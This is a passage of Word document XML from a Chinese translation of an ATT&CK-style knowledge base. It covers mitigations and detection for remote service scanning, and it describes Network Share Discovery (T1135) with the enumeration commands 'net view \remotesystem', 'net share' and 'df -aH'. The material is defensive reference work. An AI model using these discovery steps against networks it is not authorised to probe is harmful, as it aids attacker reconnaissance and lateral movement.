          <w:p w14:paraId="041D11AE" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00EC3F22" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EC3F22">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00EC3F22" w14:paraId="3BA6ACF8" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2259" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1648D7E9" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00EC3F22" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00EC3F22">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>特性或</w:t>
            </w:r>
            <w:r w:rsidRPr="00EC3F22">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>程序禁用</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7477" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="038FB886" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00EC3F22" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00EC3F22">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>确保关闭不必要的端口和服务，防止发现和可</w:t>
            </w:r>
            <w:r w:rsidRPr="00EC3F22">
              <w:t>漏洞攻击风险</w:t>
            </w:r>
            <w:r w:rsidRPr="00EC3F22">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00EC3F22" w14:paraId="427F2F0E" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2259" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04467A18" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00EC3F22" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId173" w:history="1">
              <w:r w:rsidR="00A0413E" w:rsidRPr="00EC3F22">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>网络入侵防御</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7477" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EC68F96" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00EC3F22" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00EC3F22">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用网络入侵检测</w:t>
            </w:r>
            <w:r w:rsidRPr="00EC3F22">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00EC3F22">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防御系统来检测和阻止远程服务扫描。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00EC3F22" w14:paraId="2CDD8691" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2259" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="243D0374" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00EC3F22" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId174" w:history="1">
              <w:r w:rsidR="00A0413E" w:rsidRPr="00EC3F22">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>网络分区</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7477" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53BA4B09" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00EC3F22" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00EC3F22">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>确保采取正确的网络分区来保护关键服务器和设备。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="49802A8A" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54ECBD02" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191BDD81" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A27200">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>系统和网络发现技术通常</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:r w:rsidRPr="00A27200">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>攻击者试图</w:t>
      </w:r>
      <w:r w:rsidRPr="00A27200">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>了解环境的整个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>过程</w:t>
      </w:r>
      <w:r w:rsidRPr="00A27200">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>中。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不应孤立地看待数据和事件，而应将其视为可能导致其他活动的一系列行为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>中的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一部分</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>例如横向移动</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0D674B" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>合法远程服务扫描</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相关</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的正常</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>良性系统和网络事件可能不常见，具体取决于环境及其使用方式。</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境</w:t>
      </w:r>
      <w:r>
        <w:t>中可能会有</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>合法的开放端口和漏洞扫描，并且需要与开发的任何检测功能相冲突。网络入侵检测系统也可以用于识别扫描活动。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控网络进程</w:t>
      </w:r>
      <w:r>
        <w:t>使用情况</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，并检查网络内部流</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测端口扫描。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66408262" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0096095B" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096095B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>网络</w:t>
      </w:r>
      <w:r w:rsidRPr="0096095B">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>共享</w:t>
      </w:r>
      <w:r w:rsidRPr="0096095B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>发现</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w14:paraId="629E56E7" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53D6D725" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>T1135</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="740895B5" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>技术：发现</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="086436D8" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>macOS</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0798BA23" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>所需权限：用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09299700" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程监控，进程命令行参数，网络</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>协议分析，网络</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>使用</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B929D04" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6F78BB73" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00D7717A" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05BC1B53" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00B168A9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上</w:t>
      </w:r>
      <w:r>
        <w:t>经常会有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>共享的网络驱动器和文件夹。这使得</w:t>
      </w:r>
      <w:r>
        <w:t>用户可以访问网络上各种</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统</w:t>
      </w:r>
      <w:r>
        <w:t>上的文件目录。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C70EC09" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331BE78B" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00B168A9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00B168A9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络上的文件通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00B168A9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SMB</w:t>
      </w:r>
      <w:r w:rsidRPr="00B168A9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议进行共享。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508E83E8" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00B168A9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Net</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>net view \remotesystem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命</w:t>
      </w:r>
      <w:r w:rsidRPr="00B168A9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以</w:t>
      </w:r>
      <w:r>
        <w:t>用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来查询</w:t>
      </w:r>
      <w:r w:rsidRPr="00B168A9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>远程系统中可用的共享驱动器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>net share</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令可</w:t>
      </w:r>
      <w:r>
        <w:t>以用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidRPr="00B168A9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询本地系统上的共享驱动器。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06672EE8" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00B168A9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>攻击者可能会寻找远程系统上共享的文件夹和驱动器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。他们可能</w:t>
      </w:r>
      <w:r>
        <w:t>会以此手段来</w:t>
      </w:r>
      <w:r w:rsidRPr="00B168A9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>识别信息源</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，从而</w:t>
      </w:r>
      <w:r w:rsidRPr="00B168A9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>收集信息并确定感兴趣的系统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidRPr="00B168A9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>横向移动。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7F22AB" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>Mac</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B61D04B" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00EF00C5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Mac</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统中</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF00C5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>df -aH</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF00C5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可用来</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF00C5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看本地共享。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42807C60" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56305261" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种类型的攻击技术基于系统功能的滥用，无法通过预防性控制来轻松缓解其造成的影响。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D53579" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C711B75" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00A27200">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>系统和网络发现技术通常</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:r w:rsidRPr="00A27200">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>攻击者试图</w:t>
      </w:r>
      <w:r w:rsidRPr="00A27200">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>了解环境的整个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>过程</w:t>
      </w:r>
      <w:r w:rsidRPr="00A27200">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>中。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不应孤立地看待数据和事件，而应将其视为可能导致其他活动的一系列行为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>中的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一部分</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>例如横向移动</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A370954" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00093AE2" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>合法远程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统发现</w:t>
      </w:r>
      <w:r>
        <w:t>相关</w:t>
